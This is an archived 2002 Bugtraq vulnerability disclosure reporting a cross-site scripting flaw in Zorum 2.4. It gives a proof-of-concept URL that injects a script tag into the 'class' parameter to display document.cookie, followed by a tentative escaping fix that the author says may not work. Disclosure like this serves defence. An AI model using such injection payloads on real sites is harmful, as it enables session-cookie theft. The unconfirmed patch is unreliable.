[27387] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

XSS bug in Zorum 2.4

daemon@ATHENA.MIT.EDU (Arab VieruZ)
Thu Oct 10 16:49:25 2002

Date: 10 Oct 2002 17:46:58 -0000
Message-ID: <20021010174658.32217.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Arab VieruZ <arabviersus@hotmail.com>
To: bugtraq@securityfocus.com



Vulnerable systems:
Zorum 2.4

Exploit:
z_user_show.php?method=showuserlink&class=<Scr*ipt>javascript:alert
(document.cookie)</Scr*ipt>&rollid=admin&x=3da59a9da8825&

(without "*")

Solution:
i think that will work , but im not sure

open dbtreelistproperty_method.php and put this code in line 7:

$class = HTMLSpecialChars($class);

i'm a beginer php developer soooory :)

----------------------------------
Arab Vieruz

thanx


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[27387] in bugtraq

XSS bug in Zorum 2.4

daemon@ATHENA.MIT.EDU (Arab VieruZ)Thu Oct 10 16:49:25 2002

daemon@ATHENA.MIT.EDU (Arab VieruZ)
Thu Oct 10 16:49:25 2002